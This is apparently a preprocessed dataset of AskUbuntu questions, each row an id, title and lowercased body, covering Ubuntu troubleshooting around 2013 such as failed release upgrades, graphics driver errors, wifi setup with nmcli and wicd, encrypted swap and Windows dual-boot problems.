377671	performances issues with radeon hd 5470	i 've got a dell laptop with 4gb ram , intel core 2 duo and a radeon hd 5470 graphics card , and i 'm facing some performances issues . while watching 720/1080p hd movies there are a lot of bugs and the video stream is not `` smooth '' as i excepted it to be . considering the hardware i 've got , i do n't except this laptop to run games but do except it to run hd videos properly . any idea or suggestion that may point me to the solution will be great , thanks in advance !
377672	menu items greyed out	i installed gnome 3.10 on ubuntu 13.10 . just to try it . later i decided to remove it and go beck to unity . it took me a while to remove gnome . after that i experience some issues : in some apps global menu items are greyed out ( all the menu item in gimp , messaging indicator items , ... ) i can not click any of these items , but keyboard shortcut is working ( for example - can not click `` save '' but ctrl+s works ) i have two network indicators in unity panel in session menu there is a red circle in front of my username any ideas ... ? ? ?
377673	video tearing monitor	everybody , and 1-st sorry for my poor english ... so my problem is when i watch videos ( youtube etc . ) the screen become to tear in horizontal lines with every movement of the video itself ... i tried to fix it via compizconfig manager , but without any success ... i am with easy-peasy 1.6 my configs are : packard bell dot s 10 ' notebook , and hardware : vga compatible controller : intel corporation device 0be1 ( rev 0b ) description : vga compatible controller product : intel corporation vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 0b width : 32 bits clock : 33mhz capabilities : bus_master cap_list configuration : latency=0 resources : memory:86000000-860fffff ioport:50d0 ( size=8 ) kernel driver in use : hda intel if anyone can help i would love him ; )
377676	how can i get a clamav report on infected files in the terminal ?	i scanned my system with clamav by the terminal and i wan na know what files are infected . how can i get a report for that ? i want a report on my last scan , not on the next one
377678	trying to upgrade 12.04 to 13.04 and ending up in error	hello i am trying to upgrade with sudo do-release-upgrade -d updating repository information ign http : //extras.ubuntu.com trusty release.gpg hit http : //de.archive.ubuntu.com trusty release.gpg hit http : //de.archive.ubuntu.com trusty-updates release.gpg hit http : //de.archive.ubuntu.com trusty-backports release.gpg ign http : //extras.ubuntu.com trusty release hit http : //de.archive.ubuntu.com trusty release err http : //extras.ubuntu.com trusty/main sources hit http : //de.archive.ubuntu.com trusty-updates release err http : //extras.ubuntu.com trusty/main amd64 packages err http : //extras.ubuntu.com trusty/main i386 packages ign http : //extras.ubuntu.com trusty/main translationindex hit http : //de.archive.ubuntu.com trusty-backports release hit http : //de.archive.ubuntu.com trusty/main sources hit http : //de.archive.ubuntu.com trusty/restricted sources hit http : //de.archive.ubuntu.com trusty/universe sources hit http : //de.archive.ubuntu.com trusty/multiverse sources err http : //extras.ubuntu.com trusty/main sources hit http : //de.archive.ubuntu.com trusty/main amd64 packages hit http : //security.ubuntu.com trusty-security release.gpg hit http : //de.archive.ubuntu.com trusty/restricted amd64 packages err http : //extras.ubuntu.com trusty/main amd64 packages err http : //extras.ubuntu.com trusty/main i386 packages hit http : //de.archive.ubuntu.com trusty/universe amd64 packages hit http : //de.archive.ubuntu.com trusty/multiverse amd64 packages hit http : //de.archive.ubuntu.com trusty/main i386 packages hit http : //de.archive.ubuntu.com trusty/restricted i386 packages hit http : //de.archive.ubuntu.com trusty/universe i386 packages hit http : //de.archive.ubuntu.com trusty/multiverse i386 packages hit http : //de.archive.ubuntu.com trusty/main translationindex hit http : //de.archive.ubuntu.com trusty/multiverse translationindex hit http : //security.ubuntu.com trusty-security release hit http : //de.archive.ubuntu.com trusty/restricted translationindex err http : //extras.ubuntu.com trusty/main translation-en_us err http : //extras.ubuntu.com trusty/main translation-en hit http : //de.archive.ubuntu.com trusty/universe translationindex hit http : //de.archive.ubuntu.com trusty-updates/main sources hit http : //de.archive.ubuntu.com trusty-updates/restricted sources hit http : //de.archive.ubuntu.com trusty-updates/universe sources hit http : //de.archive.ubuntu.com trusty-updates/multiverse sources hit http : //security.ubuntu.com trusty-security/main sources hit http : //de.archive.ubuntu.com trusty-updates/main amd64 packages hit http : //de.archive.ubuntu.com trusty-updates/restricted amd64 packages err http : //extras.ubuntu.com trusty/main sources err http : //extras.ubuntu.com trusty/main amd64 packages hit http : //de.archive.ubuntu.com trusty-updates/universe amd64 packages hit http : //de.archive.ubuntu.com trusty-updates/multiverse amd64 packages hit http : //de.archive.ubuntu.com trusty-updates/main i386 packages hit http : //de.archive.ubuntu.com trusty-updates/restricted i386 packages hit http : //de.archive.ubuntu.com trusty-updates/universe i386 packages hit http : //de.archive.ubuntu.com trusty-updates/multiverse i386 packages hit http : //de.archive.ubuntu.com trusty-updates/main translationindex hit http : //de.archive.ubuntu.com trusty-updates/multiverse translationindex err http : //extras.ubuntu.com trusty/main i386 packages err http : //extras.ubuntu.com trusty/main translation-en_us hit http : //de.archive.ubuntu.com trusty-updates/restricted translationindex hit http : //de.archive.ubuntu.com trusty-updates/universe translationindex hit http : //de.archive.ubuntu.com trusty-backports/main sources hit http : //de.archive.ubuntu.com trusty-backports/restricted sources hit http : //de.archive.ubuntu.com trusty-backports/universe sources err http : //extras.ubuntu.com trusty/main translation-en hit http : //de.archive.ubuntu.com trusty-backports/restricted i386 packages hit http : //de.archive.ubuntu.com trusty-backports/universe i386 packages hit http : //de.archive.ubuntu.com trusty-backports/multiverse i386 packages hit http : //de.archive.ubuntu.com trusty-backports/main translationindex hit http : //de.archive.ubuntu.com trusty-backports/multiverse translationindex err http : //extras.ubuntu.com trusty/main i386 packages 404 not found err http : //extras.ubuntu.com trusty/main translation-en ign http : //extras.ubuntu.com trusty/main translation-en_us ign http : //extras.ubuntu.com trusty/main translation-en hit http : //de.archive.ubuntu.com trusty-backports/restricted translationindex hit http : //de.archive.ubuntu.com trusty-backports/universe translationindex hit http : //de.archive.ubuntu.com trusty/main translation-en hit http : //de.archive.ubuntu.com trusty/multiverse translation-en hit http : //de.archive.ubuntu.com trusty/restricted translation-en hit http : //de.archive.ubuntu.com trusty/universe translation-en hit http : //de.archive.ubuntu.com trusty-updates/main translation-en hit http : //de.archive.ubuntu.com trusty-updates/multiverse translation-en hit http : //de.archive.ubuntu.com trusty-updates/restricted translation-en hit http : //de.archive.ubuntu.com trusty-updates/universe translation-en hit http : //de.archive.ubuntu.com trusty-backports/main translation-en hit http : //de.archive.ubuntu.com trusty-backports/multiverse translation-en hit http : //de.archive.ubuntu.com trusty-backports/restricted translation-en hit http : //de.archive.ubuntu.com trusty-backports/universe translation-en fetched 0 b in 0s ( 0 b/s ) ign http : //extras.ubuntu.com trusty release.gpg hit http : //security.ubuntu.com trusty-security release.gpg hit http : //de.archive.ubuntu.com trusty release.gpg hit http : //de.archive.ubuntu.com trusty-updates release.gpg hit http : //de.archive.ubuntu.com trusty-backports release.gpg ign http : //extras.ubuntu.com trusty release hit http : //security.ubuntu.com trusty-security release err http : //extras.ubuntu.com trusty/main sources hit http : //security.ubuntu.com trusty-security/main sources err http : //extras.ubuntu.com trusty/main amd64 packages err http : //extras.ubuntu.com trusty/main i386 packages ign http : //extras.ubuntu.com trusty/main translationindex hit http : //security.ubuntu.com trusty-security/restricted sources hit http : //security.ubuntu.com trusty-security/universe sources hit http : //security.ubuntu.com trusty-security/multiverse sources hit http : //security.ubuntu.com trusty-security/main amd64 packages hit http : //security.ubuntu.com trusty-security/restricted amd64 packages hit http : //security.ubuntu.com trusty-security/universe amd64 packages hit http : //security.ubuntu.com trusty-security/multiverse amd64 packages hit http : //security.ubuntu.com trusty-security/main i386 packages hit http : //security.ubuntu.com trusty-security/restricted i386 packages hit http : //security.ubuntu.com trusty-security/universe i386 packages hit http : //de.archive.ubuntu.com trusty release hit http : //de.archive.ubuntu.com trusty-updates release err http : //extras.ubuntu.com trusty/main sources err http : //extras.ubuntu.com trusty/main amd64 packages err http : //extras.ubuntu.com trusty/main i386 packages hit http : //security.ubuntu.com trusty-security/multiverse i386 packages hit http : //security.ubuntu.com trusty-security/main translationindex err http : //extras.ubuntu.com trusty/main translation-en_us err http : //extras.ubuntu.com trusty/main translation-en hit http : //security.ubuntu.com trusty-security/multiverse translationindex hit http : //security.ubuntu.com trusty-security/restricted translationindex hit http : //security.ubuntu.com trusty-security/universe translationindex err http : //extras.ubuntu.com trusty/main sources err http : //extras.ubuntu.com trusty/main amd64 packages hit http : //security.ubuntu.com trusty-security/main translation-en hit http : //security.ubuntu.com trusty-security/multiverse translation-en hit http : //security.ubuntu.com trusty-security/restricted translation-en err http : //extras.ubuntu.com trusty/main i386 packages err http : //extras.ubuntu.com trusty/main translation-en_us hit http : //security.ubuntu.com trusty-security/universe translation-en hit http : //de.archive.ubuntu.com trusty-backports release err http : //extras.ubuntu.com trusty/main translation-en err http : //extras.ubuntu.com trusty/main sources err http : //extras.ubuntu.com trusty/main amd64 packages err http : //extras.ubuntu.com trusty/main i386 packages hit http : //de.archive.ubuntu.com trusty/main sources hit http : //de.archive.ubuntu.com trusty/restricted sources hit http : //de.archive.ubuntu.com trusty/universe sources hit http : //de.archive.ubuntu.com trusty/multiverse sources hit http : //de.archive.ubuntu.com trusty/main amd64 packages hit http : //de.archive.ubuntu.com trusty/restricted amd64 packages err http : //extras.ubuntu.com trusty/main translation-en_us err http : //extras.ubuntu.com trusty/main translation-en hit http : //de.archive.ubuntu.com trusty/universe amd64 packages hit http : //de.archive.ubuntu.com trusty/multiverse amd64 packages hit http : //de.archive.ubuntu.com trusty/main i386 packages hit http : //de.archive.ubuntu.com trusty/restricted i386 packages hit http : //de.archive.ubuntu.com trusty/universe i386 packages hit http : //de.archive.ubuntu.com trusty/multiverse i386 packages hit http : //de.archive.ubuntu.com trusty/main translationindex hit http : //de.archive.ubuntu.com trusty/multiverse translationindex hit http : //de.archive.ubuntu.com trusty/restricted translationindex err http : //extras.ubuntu.com trusty/main sources 404 not found err http : //extras.ubuntu.com trusty/main amd64 packages 404 not found err http : //extras.ubuntu.com trusty/main i386 packages 404 not found err http : //extras.ubuntu.com trusty/main translation-en_us err http : //extras.ubuntu.com trusty/main translation-en ign http : //extras.ubuntu.com trusty/main translation-en_us ign http : //extras.ubuntu.com trusty/main translation-en hit http : //de.archive.ubuntu.com trusty/universe translationindex hit http : //de.archive.ubuntu.com trusty-updates/main sources hit http : //de.archive.ubuntu.com trusty-updates/restricted sources hit http : //de.archive.ubuntu.com trusty-updates/universe sources hit http : //de.archive.ubuntu.com trusty-updates/multiverse sources hit http : //de.archive.ubuntu.com trusty-updates/main amd64 packages hit http : //de.archive.ubuntu.com trusty-updates/restricted amd64 packages hit http : //de.archive.ubuntu.com trusty-updates/universe amd64 packages hit http : //de.archive.ubuntu.com trusty-updates/multiverse amd64 packages hit http : //de.archive.ubuntu.com trusty-updates/main i386 packages hit http : //de.archive.ubuntu.com trusty-updates/restricted i386 packages hit http : //de.archive.ubuntu.com trusty-updates/universe i386 packages hit http : //de.archive.ubuntu.com trusty-updates/multiverse i386 packages hit http : //de.archive.ubuntu.com trusty-updates/main translationindex hit http : //de.archive.ubuntu.com trusty-updates/multiverse translationindex hit http : //de.archive.ubuntu.com trusty-updates/restricted translationindex hit http : //de.archive.ubuntu.com trusty-updates/universe translationindex hit http : //de.archive.ubuntu.com trusty-backports/main sources hit http : //de.archive.ubuntu.com trusty-backports/restricted sources hit http : //de.archive.ubuntu.com trusty-backports/universe sources hit http : //de.archive.ubuntu.com trusty-backports/multiverse sources hit http : //de.archive.ubuntu.com trusty-backports/main amd64 packages hit http : //de.archive.ubuntu.com trusty-backports/restricted amd64 packages hit http : //de.archive.ubuntu.com trusty-backports/universe amd64 packages hit http : //de.archive.ubuntu.com trusty-backports/multiverse amd64 packages hit http : //de.archive.ubuntu.com trusty-backports/main i386 packages hit http : //de.archive.ubuntu.com trusty-backports/restricted i386 packages hit http : //de.archive.ubuntu.com trusty-backports/universe i386 packages hit http : //de.archive.ubuntu.com trusty-backports/multiverse i386 packages hit http : //de.archive.ubuntu.com trusty-backports/main translationindex hit http : //de.archive.ubuntu.com trusty-backports/multiverse translationindex hit http : //de.archive.ubuntu.com trusty-backports/restricted translationindex hit http : //de.archive.ubuntu.com trusty-backports/universe translationindex hit http : //de.archive.ubuntu.com trusty/main translation-en hit http : //de.archive.ubuntu.com trusty/multiverse translation-en hit http : //de.archive.ubuntu.com trusty/restricted translation-en hit http : //de.archive.ubuntu.com trusty/universe translation-en hit http : //de.archive.ubuntu.com trusty-updates/main translation-en hit http : //de.archive.ubuntu.com trusty-updates/multiverse translation-en hit http : //de.archive.ubuntu.com trusty-updates/restricted translation-en hit http : //de.archive.ubuntu.com trusty-updates/universe translation-en hit http : //de.archive.ubuntu.com trusty-backports/main translation-en hit http : //de.archive.ubuntu.com trusty-backports/multiverse translation-en hit http : //de.archive.ubuntu.com trusty-backports/restricted translation-en hit http : //de.archive.ubuntu.com trusty-backports/universe translation-en fetched 0 b in 0s ( 0 b/s ) error during update a problem occurred during the update . this is usually some sort of network problem , please check your network connection and retry . w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/trusty/main/source/sources 404 not found , w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found , w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/trusty/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . restoring original system state aborting reading package lists ... done building dependency tree reading state information ... done building data structures ... done at the moment running on 12.04 lts linux y560 3.8.0-33-generic # 48~precise1-ubuntu smp thu oct 24 16:28:06 utc 2013 x86_64 x86_64 x86_64 gnu/linux
377679	how to reinstall ubuntu desktop ? ( unmet dependencies problem )	i accidentally purge ubuntu-desktop package like so ( log file ) commandline : apt-get purge nvidia-* purge : ubuntu-desktop : i386 ( 1.267.1 ) , nvidia-common : i386 ( 0.2.44.2 ) end-date : 2013-11-15 10:13:50 start-date : 2013-11-15 10:18:43 commandline : apt-get install nvidia-current-updates install : nvidia-settings-304-updates : i386 ( 304.88-0ubuntu0.0.3 , automatic ) , nvidia-current-updates : i386 ( 304.88-0ubuntu0.0.3 ) , dkms : i386 ( 2.2.0.3-1ubuntu3.1 , $ end-date : 2013-11-15 10:20:18 now when i try to sudo apt-get install ubuntu-desktop , there is a bunch of unmet dependencies . apt-get -f install does not solve it .
377681	cx usb3 2.5-hdd-case asm1051 wont spindown/detach on ubuntu 12.04	bought this device http : //www.ebay.de/itm/281128589294 ? sspagename=strk : mewnx : it & _trksid=p3984.m1497.l2649 it mount and unmount the partitions on the drive smart is also supported the only thing what does not work is detach/spin down is it a hardware chipset problem or software problem ? uname -a linux lenovo-g555 3.2.0-56-generic # 86-ubuntu smp wed oct 23 09:20:45 utc 2013 x86_64 x86_64 x86_64 gnu/linux lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 002 : id 5986:0148 acer , inc bus 001 device 003 : id 174c:5106 asmedia technology inc . transcend storejet 25m3 lsusb -vd 001:003 bus 001 device 003 : id 174c:5106 asmedia technology inc . transcend storejet 25m3 device descriptor : blength 18 bdescriptortype 1 bcdusb 2.10 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 idvendor 0x174c asmedia technology inc. idproduct 0x5106 transcend storejet 25m3 bcddevice 0.01 imanufacturer 2 iproduct 3 iserial 1 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 32 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xc0 self powered maxpower 0ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 2 binterfaceclass 8 mass storage binterfacesubclass 6 scsi binterfaceprotocol 80 bulk-only iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x02 ep 2 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 udisks -- detach /dev/sdb detach failed : error detaching : helper exited with exit code 1 : detaching device /dev/sdb usb device : /sys/devices/pci0000:00/0000:00:12.2/usb1/1-1 ) synchronize cache : failed : no such file or directory ( continuing despite synchronize cache failure . ) stop unit : failed : no such file or directory if something is missing please let me know ... thanks
377682	specific install instructions for a retina macbook pro	i 'd like to install ubuntu as my primary os on a retina macbook pro . as i 'm unaware of the issues i 'll face i 've been trying to find instructions before starting . i 've been searching for a while and i 'm starting to get more confused instead of less . has someone got a specific guide that i should use to install 13.04 or 13.10 with ( i 'd prefer to use 13.10 as i intend to use it to develop software ) .
377685	unattended ubuntu installation lvm confirmation	i am working on getting an unattended install iso setup for deploying the current lts of ubuntu ( 12.04.3 ) and have everything just the way i want it , except it is still asking for me to confirm the changes to the lvm . all my installs are on new vm 's so there is nothing on the drives to be overwritten . here is the section of my preseed file for partitioning : # # partitioning example # if the system has free space you can choose to only partition that space . # this is only honoured if partman-auto/method ( below ) is not set . # alternatives : custom , some_device , some_device_crypto , some_device_lvm . # d-i partman-auto/init_automatically_partition select biggest_free # alternatively , you may specify a disk to partition . if the system has only # one disk the installer will default to using that , but otherwise the device # name must be given in traditional , non-devfs format ( so e.g . /dev/hda or # /dev/sda , and not e.g . /dev/discs/disc0/disc ) . # for example , to use the first scsi/sata hard disk : # d-i partman-auto/disk string /dev/sda # in addition , you 'll need to specify the method to use . # the presently available methods are : # - regular : use the usual partition types for your architecture # - lvm : use lvm to partition the disk # - crypto : use lvm within an encrypted partition d-i partman-auto/method string lvm # if one of the disks that are going to be automatically partitioned # contains an old lvm configuration , the user will normally receive a # warning . this can be preseeded away ... d-i partman-lvm/device_remove_lvm boolean true # the same applies to pre-existing software raid array : d-i partman-md/device_remove_md boolean true # and the same goes for the confirmation to write the lvm partitions . d-i partman-lvm/confirm boolean true d-i partman-lvm/confirm_nooverwrite boolean true # for lvm partitioning , you can select how much of the volume group to use # for logical volumes . d-i partman-auto-lvm/guided_size string max # d-i partman-auto-lvm/guided_size string 10gb # d-i partman-auto-lvm/guided_size string 50 % # you can choose one of the three predefined partitioning recipes : # - atomic : all files in one partition # - home : separate /home partition # - multi : separate /home , /usr , /var , and /tmp partitions d-i partman-auto/choose_recipe select atomic # or provide a recipe of your own ... # if you have a way to get a recipe file into the d-i environment , you can # just point at it . # d-i partman-auto/expert_recipe_file string /hd-media/recipe # if not , you can put an entire recipe into the preconfiguration file in one # ( logical ) line . this example creates a small /boot partition , suitable # swap , and uses the rest of the space for the root partition : # d-i partman-auto/expert_recipe string \ # boot-root : : \ # 40 50 100 ext3 \ # $ primary { } $ bootable { } \ # method { format } format { } \ # use_filesystem { } filesystem { ext3 } \ # mountpoint { /boot } \ # . \ # 500 10000 1000000000 ext3 \ # method { format } format { } \ # use_filesystem { } filesystem { ext3 } \ # mountpoint { / } \ # . \ # 64 512 300 % linux-swap \ # method { swap } format { } \ # . # if you just want to change the default filesystem from ext3 to something # else , you can do that without providing a full recipe . # d-i partman/default_filesystem string ext4 # this makes partman automatically partition without confirmation . d-i partman-md/confirm boolean true d-i partman-partitioning/confirm_write_new_label boolean true d-i partman/choose_partition select finish d-i partman/confirm boolean true d-i partman/confirm_nooverwrite boolean true # # controlling how partitions are mounted # the default is to mount by uuid , but you can also choose `` traditional '' to # use traditional device names , or `` label '' to try filesystem labels before # falling back to uuids . # d-i partman/mount_style select uuid you can find my entire preseed file here : https : //gist.github.com/rockstar04/7492426 if you think the issue lies outside of this section research : http : //bugs.launchpad.net/ubuntu/+source/debian-installer/+bug/845392 http : //serverfault.com/questions/415174/debian-6-preseeding-keeps-asking-write-the-changes-to-disks-and-configure-lvm http : //bugs.debian.org/cgi-bin/bugreport.cgi ? bug=610282
377686	mismatch in gmch_pfit.lvds_border_bits ( expected 32768 , found 0 ) at boot error , how to fix it ?	every time when my notebook is booting ubuntu show this message : [ drm : intel_pipe_config_compare ] *error* mismatch in gmch_pfit.lvds_border_bits ( expected 32768 , found 0 ) for the record , my ubuntu is working , but this message is showing every time while booting ubuntu 13.10 x64 . also getting this on ubuntu 14.04 x64 . ubuntu also seems to be working , but i get this displayed on the screen during boot and in dmesg . here is the dmesg info : [ 10.838730 ] [ drm ] initialized drm 1.1.0 20060810 [ 10.852494 ] cfg80211 : calling crda to update world regulatory domain [ 11.144081 ] intel ( r ) wireless wifi driver for linux , in-tree : [ 11.144085 ] copyright ( c ) 2003-2013 intel corporation [ 11.144226 ] iwlwifi 0000:03:00.0 : ca n't disable aspm ; os does n't have aspm co ntrol [ 11.144292 ] iwlwifi 0000:03:00.0 : irq 45 for msi/msi-x [ 11.169840 ] [ drm ] memory usable by graphics device = 2048m [ 11.228083 ] i915 0000:00:02.0 : irq 46 for msi/msi-x [ 11.228099 ] [ drm ] supports vblank timestamp caching rev 2 ( 21.10.2013 ) . [ 11.228101 ] [ drm ] driver supports precise vblank timestamp query . [ 11.228267 ] vgaarb : device changed decodes : pci:0000:00:02.0 , olddecodes=io+me m , decodes=none : owns=none [ 11.357186 ] fbcon : inteldrmfb ( fb0 ) is primary device [ 11.400117 ] [ drm : intel_pipe_config_compare ] *error* mismatch in gmch_pfit.lvd s_border_bits ( expected 32768 , found 0 ) [ 11.400118 ] -- -- -- -- -- -- [ cut here ] -- -- -- -- -- -- [ 11.400159 ] warning : cpu : 1 pid : 321 at /build/buildd/linux-3.13.0/drivers/gp u/drm/i915/intel_display.c:9299 check_crtc_state+0x255/0x340 [ i915 ] ( ) [ 11.400160 ] pipe state does n't match ! [ 11.400186 ] modules linked in : snd_seq_midi coretemp snd_seq_midi_event kvm_i ntel snd_rawmidi kvm i915 ( + ) iwlwifi snd_seq mxm_wmi snd_seq_device snd_timer tt m drm_kms_helper cfg80211 drm joydev i2c_algo_bit serio_raw lpc_ich asus_laptop wmi sparse_keymap snd soundcore input_polldev video mac_hid parport_pc ppdev lp parport hid_generic usbhid hid psmouse ahci libahci atl1c perhaps this would help : https : //bugs.freedesktop.org/show_bug.cgi ? id=74081
377687	how do i connect to a wifi network using nmcli ?	i am able to connect to a wireless network using nm-applet when running it in lightdm , however , it does not work in an openbox session that i start as myself ( a user started x session ) , but am not able to do so using nmcli . i am running nmcli using sudo . after 90 seconds , i get a time out message . what could be wrong ? this is the configuration i must use - http : //www.depts.ttu.edu/ithelpcentral/solutions/wireless/
377689	can an avira antivirus live cd scan for viruses that would infect ubuntu ?	http : //www.avira.com/en/download/product/avira-rescue-system if i were to use that would it detect things for windows , and for linux ? not just the ability to scan the filesystem , but actually look for viruses that would target ubuntu .
377693	i cant install sound for my pc . if i install win xp on virtual box , then how can i use win xp sound driver	i cant install sound for my pc on ubuntu 12.4 . if i install win xp on virtual box , then how can i use win xp sound driver not my ubuntu 12.4 who are not working , is it possible ? or maybe you can suggest any other operation system in wich i could use sound in virtual box even i dont have sound on my ubuntu 12.4 thanks !
377694	wifi connectivity issues on sony viao	unable to connect to wifi on sony viao , after initial setup and update ? do i unistall the update ? running version 12.04 regards albert
377695	windows 7 no longer booting after install	i 'm completely new to ubuntu . i just installed it to dual boot windows 7 and ubuntu 12.04 on my hp pavilion dv6 today in fact . everything seemed to go fine except for some reason i can no longer boot windows . when i select that option , it brings me to an error screen that gives me two options : either search for the reason windows can no longer boot ( recommended ) or start windows as normal . both options execute but seem to freeze almost instantly . the first option ( search for problems ) loads whatever files it loads and then freezes on that screen indefinitely . the second option , but windows normally , opens the starting windows screen but hangs there indefinitely . i do n't know why this is happening and i have no idea how to fix it . edit : i ran boot-repair and it said everything was fine but then i got the same problem i had before ( i booted from sda2 ) . this is the report boot-repair generated : http : //paste.ubuntu.com/6427911/ . this is the contents of the grub.cfg : http : //freetexthost.com/2d2gldh0ys . edit 2 : i downloaded gparted and the partition that ubuntu is on is mounted and the partition that windows is on is not mounted but it wo n't let me mount it .
377698	is it possible to receive email in `` real time '' ?	i have a pop3 windows live/hotmail account ( @ live.com ) . in windows , with outlook and perhaps other programs i do n't know about , it is possible to receive emails as soon as they are received by the server . in linux , i 've only ever been able to receive emails whenever automatic mail checks happen . is there any way to receive email in `` real time '' without using a web browser ? preferably , i would like to configure kontact to achieve this , but suggestions to use other email clients that achieve the purpose are also valid answers .
377699	different boot types	i am stuck in a problem for weeks - specially , i do n't understand the difference . my system : toshiba portege with 500 gb hd uefi in bios is activated no secure boot is activated windows 8.1 is installed ubuntu 13.10 is installed now i describe two different ways of how i boot the system : 1 . ) - start laptop ( power on ) windows 8.1 is starting no grub menu 2 . ) - i stop the boot process right at the beginning by pressing the f12 button now i can choose the type of boot medium ( dvd , usb , hd , ... ) i choose hd grub is n't starting , i can choose either ubuntu or windows to start , both is working error developing : after first time of installation of ubuntu 13.10 everything was fine windows update to windows 8.1 : microsoft killed the mbr . i used a live cd from ubuntu to boot the system and installed grub by using the chroot way it does n't matter if i reinstall grub now again by chroot and live cd or from the active system by booting way 2 . ) - no change fixing installation from ubunhtu dvd doesnt change the problem either what is the difference in starting the laptop by way 1 . ) or 2. ) ? why do i not manage the installation of grub so that the laptop is starting directly into the grub menu ?
377700	âdisk drive for dev/mapper/cryptswap 1 is not readyâ , tried other resolutions already	so i used this link http : //punygeek.blogspot.com/2012/10/ubuntu-1204-how-to-solve-disk-drive-for.html and followed it to a `` t '' and it worked fine until i restarted . i will explain a little more now . upon reboot after doing all that , and seemingly successfully i get a message almost identical but its cryptswap2 is not ready ... . this is my crypttab file : # cryptswap1 /dev/sda5 /dev/urandom swap , cipher=aes-cbc-essiv : sha256 cryptswap2 /dev/sda3 /dev/urandom swap , cipher=aes-cbc-essiv : sha256 i commented out the original , like suggested ( that was cryptswap1 ) but could n't format the original sda5 to linux-swap because it said it was mounted ( even though its inaccessible because it isnt formatted ) . so i took some unallocated space and made another partition ( 5gb ) and made it linux-swap . here is my fstap file : cat /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # # proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation # uuid=e4433331-484b-4639-8dec-9c631c22f3fd / ext4 errors=remou # swap was on /dev/sda5 during installation # uuid=70d80505-2ca5-4683-b4c9-1a9db85e3e76 none swap sw # /dev/mapper/cryptswap1 none swap sw 0 0 /dev/mapper/cryptswap2 none swap sw 0 0 here is my free -m : total used free shared buffers cached mem : 5895 1437 4457 0 39 665 -/+ buffers/cache : 733 5162 swap : 5122 0 5122 so its showing there is swap space , but there is nothing listed in gparted for swap , and im still getting the boot message saying its not ready ... what am i doing wrong , or what can i do to fix this .
377701	built in mic distortion with ubuntu 13.10	i have a serous problem considering my built in mic in my lenovo laptop ideapad s400 , i get distortion sound every time i use my mic either was for hangout , skype or recording my screen , its like my mic is always boosted and there is a heavy noise in the background . i could lower it a bit but i still get noise in the background , also my voice recording is very low . i tried couple of solutions such as adding these lines to this file- > /etc/modprobe.d/alsa-base.conf options snd-hda-intel model=generic options snd-usb-audio index=-2 options snd-hda-intel position_fix=3 also tried to adjust my mic configuration via alsamixer via terminal . my sound card is - > hda-intel - hda intel pch .
377707	downloadhelper fails to convert	i 'm trying to use the firefox add-on downloadhelper to download and convert this 'video ' of einstein : http : //sploid.gizmodo.com/listening-to-this-incredible-recording-of-einstein-will-1464557213 in order to have only its audio . unfortunately the conversion fails and i have the following information from the console . notes : i opend firefox with sudo executing /usr/bin/avconv -i /tmp/gizmodo_2249.mp4 -y -v 0 -strict experimental -ab 192k -f mp3 /home/jk/dwhelper/gizmodo_2249.mp3 the result was a 0 kb mp3-file . update : i 've decided to sudo-open firefox and remove videodownloadhelper . then i opened firefox as a nomal user with the terminal and installed the add-on ... problem persists ... now i 'm learning to use avconv .
377708	how do i connect to a wifi network using wicd ?	i am not able to connect to a wifi network using wicd . my wicd log file is as http : //paste.ubuntu.com/6423667/ the configuration i must use is as shown here - > http : //www.depts.ttu.edu/ithelpcentral/solutions/wireless/ my /etc/wicd/wireless-settings.conf file contains the below settings among other things . [ essid : ttunet ] afterscript = none dhcphostname = chrysophylax bssid = 00:24:14:10 : bf:21 postdisconnectscript = none domain = ttu dns_domain = none gateway = none use_global_dns = 0 password = eraider_cleartextpassword encryption = true ip = none beforescript = none hidden = false channel = 6 mode = master ca_cert = none never = 0 netmask = none usedhcphostname = 0 predisconnectscript = none identity = eraider_username enctype = peap-tkip dns3 = none dns2 = none search_domain = none use_settings_globally = 1 use_static_dns = 0 encryption_method = wpa2 essid = ttunet automatic = 1 dns1 = none is this configuration wrong ? why does my authentication keep failing ?
377709	run a command before reboot ( ubuntu )	i would like to run this command when ubuntu reboots ( before reboot/shutdown ) : sudo umount /home/dataserver how would i do this ?
377710	how do i install ubuntu onto an unformatted hdd using a mac and a sata-to-usb adapter without messing with the mac 's os ?	i 'm planning to install the hdd in a dell laptop . i 've had a bit of trouble trying to get the bootable usb to work for me when the hdd was in the laptop . thought i might have an easier go of it this way . but i can not mess up the mac i 'm using . should i formart the hdd to the mac os ? so , the mac will be able burn the download file to the disk ? if all else , i can just go out and purchase a dvd to burn the img onto . i 'm just trying to use the tools i currently have at my disposal .
377712	basic ubuntu configuration	i 've installed ubuntu onto a new machine and i have n't got a clue where to start . how to add a wireless network , add printers and how to access the command prompt ? this is the 1st time out of my windows comfort zone .
377714	if i change from win8 to ubuntu , will all my computer 's files remain untouched ?	i 'm sick and tired of windows 8 and have decided to take the chance to change my operating system for the first time , ever . i 'm worried about my files though ; i have no way to backup my files onto an external hard drive , and i possess no disk capable of holding that magnitude of data . if i download/install ubuntu as a new operating system , will my computer 's current files remain untouched ? and is there any other worries i should be aware of before pursuing this change ?
